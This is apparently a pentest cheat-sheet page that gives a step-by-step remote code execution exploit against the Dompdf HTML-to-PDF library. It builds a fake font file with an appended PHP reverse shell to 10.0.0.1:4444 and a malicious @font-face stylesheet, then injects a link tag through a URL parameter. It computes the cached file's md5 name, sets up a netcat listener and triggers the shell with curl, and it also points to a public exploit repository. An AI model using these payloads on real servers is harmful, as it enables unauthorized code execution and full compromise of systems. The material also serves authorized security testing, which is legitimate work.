icon

Dompdf RCE

Last modified: 2023-09-12

Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.

Exploitation

1. Create Malicious Font

First off, we need to prepare the malicious .ttf file.
Here, we find the .ttf file in our local system and copy it to the current directory and change the extention ttf to php because we want to execute PHP script.

find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php

Then add the PHP payload at the end of the file.

...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>

2. Create Malicious CSS

Next we create a malicious CSS that load the above “evil.php”.

@font-face {
  font-family: 'evil';
  src: url('http://10.0.0.1:8000/evil.php');
  font-weight: 'normal';
  font-style: 'normal';
}

3. Host PHP & CSS

Now we have the two files in current working directory.

ls

evil.css evil.php

Start web server to host them.

python3 -m http.server 8000

4. Send Request

In target website, send request to upload the HTML as below.

https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:8000/evil.css'>

Our “evil.php” is uploaded to /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php.
For example, /dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php.

To get the md5 hash, we can calculate it by the following command.

echo -n http://10.0.0.1:8000/evil.php | md5sum

2cddaeb743b6aeb5638ac0ac93c4c9f6

Also we can use Python hashlib module.

python3

>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
>>> 2cddaeb743b6aeb5638ac0ac93c4c9f6

5. Execute Malicious PHP via Cached File

Finally we get the cached file path as above so we can get the cached PHP file that executes malicious code.
For reverse shell, we need to start a listener in local.

nc -lvnp 4444

Now access to the cached PHP file.

curl https://example.com/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php

We get a shell in local terminal.


Exploitation (Automatically)

Also we can exploit with the repository.

git clone https://github.com/positive-security/dompdf-rce.git
cd dompdf-rce/exploit

Modify CSS and PHP depending on your situation. Please see the previous "Exploitation" section for the details of each file.

php -S 0.0.0.0:9001

Then send request.

https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:9001/exploit.css'>

References